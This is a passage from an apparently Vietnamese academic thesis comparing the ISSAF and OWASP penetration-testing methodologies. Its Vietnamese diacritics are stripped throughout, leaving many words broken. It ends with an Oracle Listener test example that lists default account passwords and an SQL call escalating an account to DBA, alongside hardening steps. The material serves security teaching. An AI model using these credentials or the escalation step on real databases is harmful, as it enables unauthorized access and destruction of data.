bn giai on qun l ca hot ng an ninh l Lp k hoch, nh gi, Gii quyt
v Cng nhn.
Giai on 1: Lp k hoch bao gm vic thu thp thng tin, xy dng iu
l cho d n, xc nh ngun lc, ngn sch, mu bo co ti chnh, phn tch cu
trc cng vic v khi ng d n [26].
Giai on 2: nh gi giai on ny l ct li ca phng php, dng
nh gi cc ri ro an ninh cho doanh nghip v ch trng tip cn nh gi ri ro
an ninh thng tin t quan im ca cc mc tiu kinh doanh ca doanh nghip v
ri ro lin quan [26]. u tin s xc nh ri ro vn c tn ti trong h thng, t
ri ro vn c c tm thy s tip tc xc nh cc ri ro c th xut php t mc
s dng CNTT trong doanh nghip. Xc nh ri ro CNTT ny sau c s
dng xy dng cc yu cu an ninh v kim sot an ninh ca doanh nghip. Nh
vy, giai on nh gi c chia thnh hai phn: xc nh ri ro vn c v nh
gi kim sot. Giai on ny xut mt thc hnh tt v ba giai on con l tin
nh gi, nh gi v hu nh gi. Vi mt bng danh sch cc cng vic phi
tun th bi cc thnh vin tham gia nh gi.
39
Giai on 3: X l la chn cc bin php bo v, pht trin cc k
hoch thc hin, v cung cp ti liu hng dn chnh xc cho vic thc hin, v
qu trnh ra quyt nh x l ri ro. Mt nhim v quan trng trong qu trnh x l
ri ro l khi quyt nh gim thiu ri ro c thc hin, mt hoc nhiu kim sot
gim thiu ri ro c chn v mt d n c ln k hoch thc hin cc
kim sot .
Giai on 4: Cng nhn Qu trnh cng nhn bao gm vic nh gi cc
kim sot c la chn. Kt qu nh gi l s cng nhn ca ISSAF cho mt
t chc theo hnh thc cp mt chng nhn. OISSG cung cp mt chng nhn
chnh thc v tun th ISSAF. Chng ch ny cng c th cp thng qua cc c
quan chng nhn y quyn ca OISSG.
Gii on 5: Duy tr y l giai on ph m bo t chc c chng
nhn vn tun th ISSAF mt cch lin tc. m bo iu ny, OISSG s tin
hnh thng xuyn kim tra nh gi tun th. Cc tn s cho s xem xt ny s
c da trn quy m ca cc t chc v phm vi cng nhn.
V mt k thut, ISSAF xy dng mt lot cc phng php kim th cho
tng thnh phn ca h thng CNTT nh: KTXN; KTAN mt khu; nh gi an
ninh cc thit b mng Switch, Router, Firewall, IDS, VPN, Anti-virus, SAN,
WLAN, ; nh gi an ninh my ch Windows, Linux, Novell, Web server; nh
gi an ninh ng dng web, m ngun, CSDL; n nh gi an ninh phi cng ngh
nh an ninh vt l; cng ngh x hi. Trong phm vi lun vn, tc gi ch nghin
cu v trnh by phng php KTXN trong ISSAF. Nhn chung phng php ny
cng ging nh hu ht phng php KTXN khc, tuy nhin vi cch tip cn c
th chi tit tng danh sch cng vic vi m t tng lnh hay th thut cn thc
hin lm cho phng php tr nn trc quan, d hiu.
40
2.2.2. Khung lm vic kim th xm nhp ISSAF
Phng php KTXN ca ISSAF bao gm 3 giai on tip cn v 9 bc nh
gi l:
Giai on 1: Ln k hoch v chun b y l giai on trao i thng tin
ban u, lp k hoch v chun b cho kim th. K tha thun nh gi chnh thc
lm c s php l. Xc nh thi gian v khong thi gian kim th, nhm tham
gia kim th, hng leo thang,
Giai on 2: nh gi y l giai on thc s thc hin KTXN. Trong giai
on ny, mt cch tip cn theo lp c tun th. C chn lp nh gi bao gm:
Lp 1. Thu thp thng tin
Lp 2. Lp bn mng
Lp 3. Xc nh l hng
Lp 4. Xm nhp
Lp 5. Truy cp & leo thang c quyn
Lp 6. Lit k thm
Lp 7. Tha hip user/site t xa
Lp 8. Duy tr truy cp
Lp 9. Xa du vt
Cc bc c thc hin lp i lp li i din bi cc mi tn vng trn
trong giai on nh gi trong hnh 7. c bit chn lp c m t rt k v gii
thiu rt nhiu phn mm tng ng c th s dng trong tng lp hoc tham kho
khi kim th. Tham kho chi tit ti phn C ISSAF 0.2.1 draft [26].
Giai on 3: Bo co, dn dp v hy hu qu - bao gm bo co bng li ni
(thc hin khi c vic t xut hoc vn quan trng khi KTXN) v bo co cui
cng thc hin sau khi hon thnh tt c cc ca kim th c xc nh trong phm
41
vi cng vic. Cui cng l dn dp hu qu, tt c cc thng tin c to ra
v/hoc c lu tr trn h thng kim th cn c loi b khi h thng ny.
Nu khng th loi b trn mt h thng t xa, tt c nhng tp tin ny (vi v tr
ca n) nn c cp trong bo co k thut cc nhn vin k thut ca
khch hng c th loi b nhng bo co to ra.
Phng php
(1) Lp k hoch v chun b
(
2
)
n
h
g
i
(3) Bo co, dn dp v hy hu qu
Hnh 8: S phng php KTXN ca ISSAF
Phng php
KTXN
1. Thu thp
thng tin
2. Lp bn
mng
3. Xc nh
l hng
4. Xm
nhp
5. Truy cp v
leo thang c
quyn
6. Thu thp
thm
7. Gy tn
thng user/site
t xa
8. Duy tr
truy cp
9. Xa du
vt
42
2.2.3. Kt lun v phng php ISSAF
Tuy vn cha hon thin hon ton nhng ISSAF vn c cc tnh nng v li
ch chnh sau y:
Cung cp mt xut an ninh h tng gi tr cao bng cch nh gi
kim sot an ninh hin c chng li cc l hng nghim trng.
Khung lm vic gii quyt cc khu vc quan trng khc nhau ca an
ninh thng tin. Bao gm nh gi ri ro, c cu v qun l kinh doanh,
nh gi kim sot, qun l nhm cng vic, pht trin chnh sch an
ninh, v kinh nghim thc t tt.
Cc qu trnh nh gi k thut tng th c cung cp bi ISSAF bao
gm qun l hot ng, nh gi an ninh vt l, phng php KTXN,
qun l s c, qun l thay i, qun l kinh doanh lin tc, nhn thc
v an ninh, v tun th php lut v quy nh.
Phng php KTXN ca ISSAF c cu trc hon ton r rng v trc
quan gip kim tra an ninh ca mt h thng, mng, hoc ng dng.
Bi v khung lm vic c th tp trung vo cng ngh mc tiu c th
bao gm thit b nh tuyn, chuyn mch, tng la, IDS, SAN, VPN,
HH khc nhau, my ch ng dng web, CSDL, v.v.
N kt ni quan im gia k thut v qun l i vi KTAN bng
cch thc hin cc kim sot cn thit x l c hai lnh vc.
ISSAF cho php gii qun l hiu nhng ri ro hin ti tn ti u
trn phng th ngoi vi ca t chc v ch ng gim thiu bng cch
xc nh cc l hng c th nh hng n tnh ton vn kinh doanh.
Li ch kinh t ca ISSAF
43
H tr tiu chun IEC/ISO 27001:2005(BS7799), Sarbanes Oxley
SOX404, CoBIT, SAS70 and COSO qua tng thm gi tr cc hot
ng kinh doanh da trn CNTT.
Gi tr chnh ca n xut pht t thc t l n cung cp mt ngun ti
nguyn kim th qua gii phng ngi s dng khi phi u t
ngun lc v nghin cu gii quyt vn an ninh thng tin ca mnh.
c thit k t di ln
ISSAF bao gm mt tp hp phong ph chun nh gi k thut c s
kim th mt s cng ngh v quy trnh khc nhau. Nhng iu ny li t ra mt
vn khc l bo tr, lin tc cp nht cc khung lm vic phn nh cc tiu
ch nh gi cng ngh mi hoc cp nht cng c. So snh vi phng php
OSSTMM, th OSSTMM t b nh hng bi nhng vn li thi bi v cc kim
th vin c th c th s dng cng mt phng php trong s cc nhm cng vic
an ninh bng cch s dng b cng c v k thut khc nhau. Ngoi ra, phng
php OSSTMM tp trung vo nh gi an ninh v khng ch trng nhiu n phn
tch ri ro, cn ISSAF th ngc li tp trung vo phn tch v qun l ri ro nhiu
hn. Tm li, ISSAF c th c lin kt vi OSSTMM hoc bt k phng php
kim th tng t khc, t kt hp c nhng th mnh ca nhau. Tuy nhin,
lu quan trng rng ISSAF l vn cn trong giai on s khai khi so vi phng
php lun v cc khung lm vic khc.
2.3. Phng php OWASP
2.3.1. Gii thiu
Open Web Application Security Project (OWASP) [27] ra i nm 2001, y
l mt t chc phi li nhun, cng ng m, mc tiu chnh ca t chc l ci tin
an ninh cc phn mm ng dng, c bit l ng dng web. T chc ny cng xy
dng nhiu cng c khc nhau cho vic kim th v u l m ngun m v min
44
ph. OWASP ng h phng php tip cn an ninh ng dng theo Con ngi, Quy
trnh, v Cng ngh v y l nhng nhn t to ra phn mm, nhng nhn t trn
c hnh vi an ton th phn mm an ton. Theo OWASP, cc ng dng web trn
mng hu ht phi tip xc vi bn ngoi, nn n s l i tng u tin chu cc
cuc tn cng ph hoi v sa i tri php. V vy, y s l cnh cng cho k tn
cng xm nhp vo lp ng dng trc khi thc hin cc bc tip theo xm nhp
vo h thng. V l hng an ninh ny rt ph bin, mt s phng php kim th
c gii thiu nhm nh gi s trm trng ca cc ri ro an ninh c bn ca
ng dng web. Mt n lc c thc hin bi cng ng m OWASP l xy dng
khung lm vic KTXN ng dng web v thc y d n OWASP top 10 nhm
nng cao nhn thc an ninh ng dng ca cc t chc. D n OWASP top 10
khng tp trung vo cc chng trnh ng dng an ninh hon thin, m cung cp
mt nn tng cn thit tch hp an ninh thng qua cc nguyn tc v thc hnh
lp trnh an ton [3]. D n OWASP top 10 phn loi ri ro an ninh ng dng web
bng cch nh gi cc hng tn cng hng u v l hng an ninh trong mi
quan h i vi cc tc ng k thut v kinh doanh ca n. Vic nh gi mi
ri ro hng u ca d n s thc hin theo chu k mi nm mt ln nhm mc
ch ch ra nhng ri ro nghim trng nht trong tng nm (ch khng ch c 10
ri ro cn xem xt m rt nhiu, tuy nhin hng nm OWASP s chn ra 10 ri ro
nguy hi nht). D n cng cung cp hng dn c th gip kim th, xc minh, v
khc phc tng phn cc l hng ca mt ng dng nh th no. Tuy khng tp
trung nhng c mt s hng dn c sn t cng ng OWASP cho nhng ngi
pht trin v ngi KTAN qun l hiu qu cc ng dng web v mt an ninh.
Theo lin kt di y [27]:
Developer's Guide:
www.owasp.org/index.php/Guide
Testing Guide:
www.owasp.org/index.php/Category:OWASP_Testing_Project
45
Code Review Guide:
www.owasp.org/index.php/Category:OWASP_Code_Review_Project
i vi OWASP, an ninh phn mm ni chung v ng dng web ni ring
phi c ch trng ngay t giai on u tin: nh ngha, thit k v duy tr cho
n cc giai on sau ny nh: pht trin, trin khai, bo tr. Tm li, KTAN nn
c p dng trong sut vng i pht trin phn mm (SDLC).V vy hng dn
ny khng ch dnh cho ngi KTAN m cn phi c c v s dng bi ngi
pht trin v kim th phn mm. Gi thng tin an ninh lin tc cp nht l mt
kha cnh quan trng ca d n hng dn ny. p ng yu cu trn, OWASP
p dng phng php tip cn wiki, cng ng OWASP c th pht trin v m
rng thng tin trong ti liu hng dn ny bt kp vi s pht trin nhanh
chng ca cc mi e da an ninh nhm vo ng dng.
2.3.2. Nguyn tc kim th
hiu c phng php lun ca OWASP, cn hiu cc nguyn tc kim
th m n quan nim. ra nhng nguyn tc kim th gip ngi kim th nh
hng ng khi lm vic ng thi cng l kim ch nam ca t chc OWASP khi
xy dng khung lm vic. Cc nguyn tc nh sau:
Khng c phn mm cng nh cng c bo v ng dng an ton tuyt
i.
Khng tip cn an ninh theo kiu chin thut m l chin lc. chin
thut l m hnh v li v xm nhp (patch and penetrate) lin quan n
ca s bc l ca l hng (hnh 8), bao gm vic sa cha mt li c
bo co, m khng iu tra thch ng cc nguyn nhn gc r [27].
ngn chn iu ny, cn thit phi xy dng an ninh trong SDLC theo
tiu chun, chnh sch v hng dn pht trin ph hp.
46
SDLC l trn ht. OWASP cho rng pht trin phn mm cn tun th
mt SDLC no v an ninh phi c xem xt tr thnh mt thnh
phn ca quy trnh SDLC ang ng dng.
Kim th sm v kim th thng xuyn, mc tiu l pht hin sm li
trong SDLC, lc li c th c gii quyt mt cch nhanh chng v
vi chi ph thp hn.
OWASP cho rng KTAN phi i xa hn kim th phn mm thng
thng. Trong khi kim th phn mm s kim tra cc hnh vi bnh
thng ca ngi dng khi s dng theo cch m bn mong i. Th
KTAN i hi phi i xa hn nhng g c mong i v suy ngh
ging k tn cng c ph hoi ng dng.
Yu cu ti liu hng dn chnh xc ca ng dng. Kin trc, s
lung d liu, use case, v nhiu hn na cn phi c vit trong cc
ti liu chnh thc v c th xem li c.
Khng xem nh v b qua nhng chi tit nh nht nht khi nh gi an
ninh ng dng. Cn thn pht hin v loi b nhng kt lun dng
tnh gi trong bo co; u tin xem xt m ngun pht hin cc vn
an ninh bt c khi no c m ngun.
Pht trin v xy dng c ch o lng v thang o nht qun. OWASP
khuyn ngh dng s liu tiu chun c cung cp bi d n OWASP
Metrics.
Cui cng, cn c mt bo co chnh thc nhng hot ng kim th
cng nh kt qu t c. Cn xy dng nh dng thng nht gip
cc bn d hiu. nn c nhn vin chuyn trch vit bo co.
47
Hnh 9: Ca s bc l ca l hng
2.3.3. Cc k thut kim th
OWASP gii thiu cc k thut kim th chnh sau y c th c s dng
khi xy dng mt chng trnh kim th, l:
Kim tra & xem xt th cng.
Kim tra th cng l nhng nh gi mang yu t con ngi nh kim tra cc
tc ng n an ninh ca con ngi, chnh sch, v quy trnh. Nhng c th bao
gm: kim tra quyt nh cng ngh nh thit k kin trc. Chng thng c
thc hin bng cch phn tch ti liu hoc thc hin cc cuc phng vn vi ngi
thit k hoc ch s hu h thng. OWASP nh gi y l k thut mnh v hiu
qu nht.
M hnh mi e da.
Bn v
c
ci t
trn tt
c cc
h
thng
b nh
hng
Bn v
c
bit
rng
ri
Bn v
c
pht
hnh
Cng
c an
ninh
c
cp
nht
Mc
ri
ro
Thi gian
L hng
b pht
hin
L hng
c cng
khai
L hng
c bit
bi nh
cung cp
Nh cung
cp thng
bo cho
khch
hng
48
M hnh ha mi e da tr thnh mt k thut ph bin gip ngi thit
k h thng suy ngh v cc mi e da an ninh m h thng/ng dng ca h c
th phi i mt. OWASP khuyn nn dng mt phng php n gin theo tiu
chun nh gi ri ro NIST 800-30 [i16].
nh gi m ngun.
nh gi m ngun l qu trnh kim tra th cng m ngun ca mt ng
dng web tm cc vn an ninh. Vi m ngun, mt ngi kim th c th xc
nh chnh xc nhng g ang xy ra (hoc cho rng c th xy ra) v loi b cng
vic phng on ca kim th hp en. Phn tch m ngun cng c th cc k
hiu qu tm cc vn thc hin, nh nhng ni no xc nhn u vo khng
thc hin hoc khi no th tc kim sot khng m.
KTXN.
KTXN l mt k thut ph bin c s dng KTAN mng trong nhiu
nm trc y. N cng thng c gi l kim th hp en hoc hacking o
c. KTXN c bn l ngh thut kim th mt ng dng ang chy t xa, m
khng bit cc hot ng bn trong ca bn thn ng dng, tm cc l hng an
ninh. i vi OWASP th KTXN khng phi l k thut kim th quan trng nht
m n phi thc hin sau cng, khi ng dng c hnh thnh, trin khai thnh
sn phm. N cho rng KTXN chng minh l c hiu qu trong an ninh mng,
nhng k thut ny khng t nhin ng khi p dng vo KTAN ng dng.
Tm li, mc d dnh phn ln cho hng dn KTXN ng dng web, nhng
d n OWASP khng coi y l k thut chnh hoc duy nht kim th ng
dng web. Thi im s dng n trong quy trnh SDLC nh hnh di cho thy
mt t l i din in hnh trong k thut kim th (hnh 9):
49
Hnh 10: K thut kim th p dng trong cc giai on SDLC
2.3.4. Khung lm vic kim th ca OWASP
y c xem nh l mt m hnh lm vic tham chiu bao gm k thut,
nhim v ph hp ti cc giai on khc nhau ca SDLC. Cc cng ty v cc nhm
d n c th s dng m hnh ny pht trin khung lm vic kim th ring ca
h v tn dng cc dch v kim th t cc nh cung cp. Khung lm vic ny
khng nn xem nh l quy tc, m l mt cch tip cn linh hot c th c m
rng v lm khun ph hp vi quy trnh v vn ha pht trin ca mt t chc.
C nhiu phng php pht trin phn mm nh Rational Unified Process,
eXtreme v Agile, v phng php thc nc truyn thng. Mc ch ca m hnh
ny l khng pht trin da trn mt phng php c th v cng khng cung cp
hng dn c th tun th bt k phng php c th no. Thay vo , y ch
trnh by mt m hnh pht trin chung c ch trng n KTAN, v ty vo trng
hp c th, ngi c nn iu chnh n ph hp vi quy trnh cng ty ca h.
Giai on 1: trc khi bt u pht trin.
Trc khi bt u pht trin ng dng:
Kim tra m bo rng c mt SDLC y vi an ninh c sn.
Thm tra v xem xt
th cng
Xem xt m ngun
KTXN
Thu thp phn
tch yu cu
thit k
pht trin
trin khai
bo tr
Cc giai on ca SDLC
Cc giai on kim th tng ng
50
Kim tra m bo rng cc chnh sch v cc tiu chun c t ra
cho nhm pht trin l thch hp.
Xy dng cc tiu chun s liu v o lng.
Giai on 1A: Xem xt chnh sch v chun.
m bo rng c chnh sch, tiu chun, v ti liu ph hp. Ti liu l v
cng quan trng v n cho php nhm pht trin c hng dn v chnh sch m h
c th lm theo.
Giai on 1B: pht trin chun o lng v s.
Trc khi bt u pht trin, ln k hoch cho chng trnh o lng. iu
cn thit l nh ngha cc s liu trc khi bt u pht trin, nu cn thit phi
sa li quy trnh ly c d liu.
Giai on 2: nh ngha v thit k
Giai on 2A: Xem xt cc yu cu an ninh
Cc yu cu an ninh nh ngha mt ng dng lm vic nh th no t gc
an ninh. iu cn thit l cc yu cu an ninh cn c kim th. Kim th trong
trng hp ny c ngha l kim tra cc gi nh c thc hin trong cc yu cu,
v kim th xem c nhng khong trng trong nh ngha yu cu.
Giai on 2B: Xem xt thit k v kin trc
Cc ng dng cn phi c mt ti liu thit k v kin trc. iu cn thit l
kim th cc ti liu ny m bo rng vic thit k v kin trc thc thi cc
mc thch hp vi an ninh theo quy nh trong yu cu an ninh. Xc nh cc
sai st an ninh trong giai on thit k l khng ch l mt trong nhng cch hiu
qu nht v chi ph xc nh khuyt tt, m cn l mt trong nhng cch hiu
51
qu nht thc hin thay i. Nu pht hin c im yu, chng nn c trao
cho kin trc s h thng tm cc phng php thay th.
Giai on 2C: To v xem xt m hnh UML
S dng cc m hnh ny xc nhn vi ngi thit k h thng mt s hiu
bit chnh xc v cch thc ng dng lm vic. Nu pht hin c im yu,
chng nn c trao cho kin trc s h thng tm cc phng php thay th.
Giai on 2D: To v xem xt m hnh mi e da
Nhm nh gi thit k v kin trc, v cc m hnh UML gii thch chnh
xc cch thc hot ng ca h thng, thc hin xy dng m hnh mi e da.
Xy dng cc kch bn e da thc t. Phn tch thit k v kin trc m bo
rng cc mi e da ny c gim nh n mc chp nhn bi yu cu kinh
doanh. Khi cc mi e da c xc nh khng c chin lc gim nh, xem xt
li thit k v kin trc vi kin trc s h thng iu chnh thit k.
Giai on 3: Pht trin
V mt l thuyt, pht trin l vic thc hin t thit k. Tuy nhin, trong th
gii thc, nhiu quyt nh thit k c thc hin trong qu trnh pht trin phn
mm. y l nhng quyt nh nh hn hoc l qu chi tit c m t trong
thit k, hoc trong cc trng hp khc, nhng vn m khng c hng dn
chnh sch hoc tiu chun c cung cp. Nu thit k v kin trc khng y
, ngi pht trin s phi i mt vi nhiu quyt nh. Nu c chnh sch v
tiu chun khng , ngi pht trin s phi i mt vi quyt nh nhiu hn.
Giai on 3A: Kho st m ngun
52
Nhm an ninh nn thc hin duyt qua m ngun vi nhng ngi pht trin,
v trong mt s trng hp, cc kin trc s h thng. hiu mt mc cao
lung cng vic, b tr v cu trc ca m ngun xy dng nn ng dng.
Giai on 3B: Xem xt m ngun
Sau khi trang b hiu bit tt v cc m ngun c cu trc nh th no v
ti sao nhng iu c lp trnh nh vy, ngi kim th c th kim tra
cc m ngun thc t tm khim khuyt an ninh.
V t l li nhun trn ngun lc u t (ch yu l thi gian), nh gi m
ngun tnh c kt qu cht lng cao hn bt k phng php nh gi an ninh no
khc v t da vo k nng ca ngi kim th. Tuy nhin, mt mnh n khng
gii quyt mi vn m cn phi c xem xt cn thn trong mt ch kim
th y .
Giai on 4: Trin khai
Giai on 4A: KTXN ng dng
Sau khi kim tra cc yu cu, phn tch thit k, v thc hin xem xt m, c
th gi nh rng tt c cc vn c pht hin. Hy vng y l trng hp
ng, nhng KTXN cc ng dng sau khi n c trin khai cung cp mt
kim tra cui cng m bo rng khng c g b b qua.
Giai on 4B: Kim th cu hnh qun l
KTXN ng dng nn bao gm kim tra cc c s h tng c trin khai
v an ton nh th no. Trong khi ng dng c th c an ton, mt kha cnh
nh ca cu hnh vn c th l l hng khai thc.
Giai on 5: Bo tr v iu hnh
53
Giai on 5A: Thc hin xem xt hot ng qun l
Cn mt quy trnh vi chi tit lm th no hot ng ca c ng dng v c s
h tng c qun l.
Giai on 5B: Tin hnh kim tra sc khe nh k
Kim tra sc khe hng thng hoc hng qu cn c thc hin trn c ng
dng v c s h tng m bo khng c ri ro an ninh mi xut hin v mc
an ninh vn cn nguyn vn.
Giai on 5C: m bo xc minh thay i
Sau mi thay i c ph duyt v kim th trong mi trng bo m
cht lng v trin khai vo mi trng sn phm, quan trng l mt phn ca qu
trnh qun l thay i, thay i s c kim tra m bo rng mc an ninh
khng b nh hng bi thay i.
54
T
r
c
k
h
i
p
h
t
t
r
i
n
h
n
g
h
a
v
t
h
i
t
k
P
h
t
t
r
i
n
T
r
i
n
k
h
a
i
B
o
t
r
Hnh 11: Lung cng vic trong khung kim th OWASP
2.3.5. kim th xm nhp ng dng web OWASP
Theo OWASP, KTXN s khng bao gi l mt khoa hc chnh xc vi mt
danh sch y ca tt c cc vn cn c kim th v KTXN ch l mt k
thut thch hp KTAN cc ng dng web trong nhng hon cnh nht nh.
Phng php KTXN ng dng web ca OWASP da trn tip cn hp en. Ngi
kim th khng bit hoc bit rt t thng tin v cc ng dng c kim th. M
hnh kim th bao gm:
Xc
minh
thay i
Kim ra
sc
khe
Xem xt
hot
ng
qun l
Kim
th hi
quy
KTXN Xem xt
cu hnh
qun l
Kim
th n
v v h
thng
Kim
th chp
nhn
Xem xt
m
ngun
Kho st
m
ngun
Kim
th n
v v h
thng
Xem xt
yu cu
Xem xt
thit k
v kin
trc
To/Xe
m xt
m hnh
UML
Quy trnh xem xt SDLC
Xem xt
chnh
sch
Xem xt
chun
To/Xe
m xt
m hnh
e da
Truy tm
ngun
gc s
liu o
lng
chun
55
Ngi kim th: thc hin cc hot ng kim th.
Cng c v phng php: ct li l D n hng dn kim th [27].
p dng: kim th hp en
Kim th c chia thnh 2 giai on, tng ng vi hai ch th ng v
ch ng:
Giai on 1 ch th ng: trong ch ny, ngi kim th c
gng hiu c logic ca ng dng. Cng c c th c s dng
thu thp thng tin, v d: mt ng dng proxy HTTP quan st tt c
cc yu cu v phn hi trn HTTP. Vo cui ca giai on ny, ngi
kim th cn phi hiu tt c cc im truy cp (ca) ca ng dng (v
d, tiu HTTP, cc thng s, v cc tp tin cookie). Phn Thu thp
thng tin gii thch lm th no thc hin mt kim th ch th
ng. V d, ngi kim th c th tm thy nhng iu sau y:
https://www.example.com/login/Authentic_Form.html
iu ny c th ch ra mt hnh thc xc thc, trong ng dng yu
cu mt tn ngi dng v mt khu. Cc thng s sau y i din cho
hai im truy cp (ca) cho ng dng:
http://www.example.com/Appx.jsp?a=1&b=1
Trong trng hp ny, ng dng cho thy hai ca (thng s a v b).Tt
c cc ca tm thy trong giai on ny i din cho mt im kim
th. Lu mt bng tnh vi cc cy th mc ca ng dng v tt c cc
im truy cp s c ch cho giai on th hai.
Giai on 2 ch ch ng: trong giai on ny, ngi kim th bt
u kim th bng cch s dng cc phng php m t trong chng
56
4 Hng dn kim th OWASP [27]. OWASP chia tp kim th ch
ng thnh 9 loi nh vi tng s 66 bi vit hng dn kim th:
Kim th Qun l cu hnh.
Kim th Logic kinh doanh.
Kim th Xc thc.
Kim th Qun l phin.
Kim th Cp quyn.
Kim th Xc nhn d liu.
Kim th T chi Dch v.
Kim th Dch v Web.
Kim th Ajax.
Mt bng danh sch cc bi vit hng dn kim th c lit k ti trang 47
Hng dn kim th OWASP V 3.0 theo mu nh sau
Loi M s Tn kim th L hng
Thu
thp
thng
tin
OWASP-IG-001 Spiders, Robots and Crawlers Khng
OWASP-IG-002 Search Engine Discovery /
Reconnaissance
OWASP-IG-003 Identify application entry points
OWASP-IG-004 Testing for Web Application
Fingerprint
OWASP-IG-005 Application Discovery
OWASP-IG-006 Analysis of Error Codes Bc l thng tin
Qun l
cu
hnh
OWASP-CM-001 SSL/TLS Testing (SSL Version,
Algorithms, Key length, Digital Cert.
Validity)
im yu SSL
OWASP-CM-002 DB Listener Testing
OWASP-CM-003 Infrastructure Configuration
Management Testing
Bng 4: Mu minh ha bi vit hng dn kim th
Nhng hng dn chi tit cho tng bi vit hng dn kim th c trnh
by k trong ti liu hng dn kim th OWASP v 3.0 [27]. Trong phm vi lun
vn ch trnh by mt hng dn lm v d, l OWASP-CM-002 Kim th
Listener ca CSDL Oracle:
M t khi qut
57
Listener ca CSDL Oracle l mt tin trnh mng ca CSDL Oracle. N ch
i cc yu cu kt ni t my khch xa. Tin trnh ny c th b tn hi v do
c th nh hng n s sn sng ca CSDL.
M t vn
Listener ca CSDL l u vo cho cc kt ni t xa n CSDL Oracle. N
lng nghe yu cu kt ni v x l chng cho ph hp. Tn cng ny c kh nng
thc hin nu ngi kim th c th truy cp c vo dch v ny kim th nn
c thc hin t mng ni b (ch yu ci t Oracle khng tip xc vi mng
bn ngoi). Theo mc nh, Listener dng cng 1521 (cng 2483 l cng ng k
chnh thc mi TNS Listener v 2484 cho TNS Listener s dng SSL). Tt nht l
Listener thay i t cng ny n mt s cng ty khc. Nu Listener tt th
khng th truy cp t xa vo CSDL, to ra mt cuc tn cng t chi dch v.
Cc khu vc tn cng tim nng:
Dng Listener gy ra mt cuc tn cng t chi dch v.
Thit lp mt khu v ngn chn ngi khc kim sot Listener.
Ghi li cc file trace v log ti bt k file no c th truy cp bi ch s
hu tin trnh tnslnsr (thng l Oracle) C th r r thng tin.
Thu c thng tin chi tit v cc Listener, CSDL, v cu hnh.
Kim th hp en v v d
Khi khm ph cng trn Listener hot ng, ngi ta c th nh gi
Listener bng cch chy mt cng c c pht trin bi Integrigy:
58
Hnh 12: Phn mm Integrigy
Cng c trn kim tra thng tin sau y:
Mt khu Listener (listener password). Trn nhiu h thng Oracle, mt khu
Listener c th khng c thit lp. Cng c trn xc minh iu ny. Nu mt
khu khng c thit lp, mt k tn cng c th thit lp mt khu v chim
quyn iu khin Listener, mc d mt khu c th c g b bng cch chnh
sa tp tin listener.ora trn my ch.
Kch hot tnh nng logging (listener logging). Cc cng c trn cng kim
tra xem nu logging c kch hot. Nu khng, ngi ta khng pht hin bt
k thay i cho Listener hoc c mt bn ghi ca n. Ngoi ra, khi pht hin cc
cuc tn cng brute force vo Listener, h thng s khng ghi li.
Hn ch qun tr (admin restrictions). Nu hn ch qun tr khng c kch
hot, c th s dng lnh SET t xa.
V d: Nu ta tm thy mt cng TCP/1521 m trn mt my ch, ta c th
on c mt Listener Oracle chp nhn kt ni t bn ngoi vo. Nu Listener
59
khng c bo v bi mt c ch xc thc, hoc nu ta c th tm thy d dng
thng tin xc thc, th c th khai thc l hng ny lit k cc dch v Oracle.
V d, bng cch s dng lsnrctl.exe. (C trong tt c cc bn ci t Oracle 9i), ta
c th c c kt qu nh sau:
TNSLSNR for 32-bit Windows: Version 9.2.0.4.0 - Production
TNS for 32-bit Windows: Version 9.2.0.4.0 - Production
Oracle Bequeath NT Protocol Adapter for 32-bit Windows: Version 9.2.0.4.0
Windows NT Named Pipes NT Protocol Adapter for 32-bit Windows: Version
Windows NT TCP/IP NT Protocol Adapter for 32-bit Windows: Version 9.2.0.4
SID(s): SERVICE_NAME = CONFDATA
SID(s): INSTANCE_NAME = CONFDATA
SID(s): SERVICE_NAME = CONFDATAPDB
SID(s): INSTANCE_NAME = CONFDATA
SID(s): SERVICE_NAME = CONFORGANIZ
SID(s): INSTANCE_NAME = CONFORGANIZ
T ta bit c SID ca Oracle. Oracle Listener cho php lit k ti khon
ngi dng mc nh trn Oracle Server:
User name Password
OUTLN OUTLN
DBSNMP DBSNMP
BACKUP BACKUP
MONITOR MONITOR
PDB CHANGE_ON_INSTALL
Trong trng hp ny, ta khng tm thy ti khon c quyn DBA, nhng ti
khon OUTLN v BACKUP gi mt quyn c bn: EXECUTE ANY
PROCEDURE. iu ny c ngha rng n l c th thc hin bt k th tc no, v
d nh sau:
exec dbms_repcat_admin.grant_admin_any_schema('BACKUP');
Thc hin lnh ny cho php ti khon BACKUP nhn c quyn DBA.
By gi ngi dng c th tng tc trc tip vi CSDL v thc thi, v d:
select * from session_privs;
u ra l cc nh chp mn hnh sau y:
60
Hnh 13: Minh ha ly quyn DBA
V vy, ngi dng by gi c th thc hin rt nhiu hot ng, c th l:
DELETE ANY TABLE v DROP ANY TABLE.
Cng mc nh ca Listener: Trong giai on tm hiu mt my ch Oracle,
ta c th khm ph ra cc cng sau y. Sau y l danh sch cc cng mc nh:
1521: Default port for the TNS Listener.
1522 1540: Commonly used ports for the TNS Listener
1575: Default port for the Oracle Names Server
1630: Default port for the Oracle Connection Manager client connections
1830: Default port for the Oracle Connection Manager admin connections
2481: Default port for Oracle JServer/Java VM listener
2482: Default port for Oracle JServer/Java VM listener using SSL
2483: New port for the TNS Listener
2484: New port for the TNS Listener using SSL
Kim th hp xm v v d
Kim th hn ch nhng quyn ca Listener
iu quan trng l cung cp cho Listener quyn ti thiu n khng th c
hoc vit cc tp tin trong CSDL hoc trong khng gian a ch b nh my ch.
61
Tp tin Listener.ora c s dng xc nh cc thuc tnh ca Listener.
Nn kim tra xem dng sau l hin c trong file listener.ora:
ADMIN_RESTRICTIONS_LISTENER=ON
Mt khu Listener: Nhiu khai thc thng thng c thc hin do mt khu
Listener khng c thit lp. Bng cch kim tra cc file listener.ora, ngi ta c
th xc nh mt khu c thit lp khng:
Mt khu c th c thit lp th cng bng cch chnh sa file listener.ora.
iu ny c thc hin bng cch chnh sa nh sau: PASSWORDS_ <listener name>.
Vn vi phng php th cng ny l mt khu c lu tr dng vn bn
thun ty, v c th c bi bt c ai c th truy cp tp tin listener.ora. Mt cch
an ton hn l s dng cng c LSNRCTL v gi lnh change_password.
LSNRCTL for 32-bit Windows: Version 9.2.0.1.0 - Production on 24-FEB-2004
Copyright (c) 1991, 2002, Oracle Corporation. All rights reserved.
Welcome to LSNRCTL, type "help" for information.
LSNRCTL> set current_listener listener
Current Listener is listener
LSNRCTL> change_password
Old password:
New password:
Re-enter new password:
Connecting to <ADDRESS>
Password changed for listener
The command completed successfully
LSNRCTL> set password
Password:
The command completed successfully
LSNRCTL> save_config
Connecting to <ADDRESS>
Saved LISTENER configuration parameters.
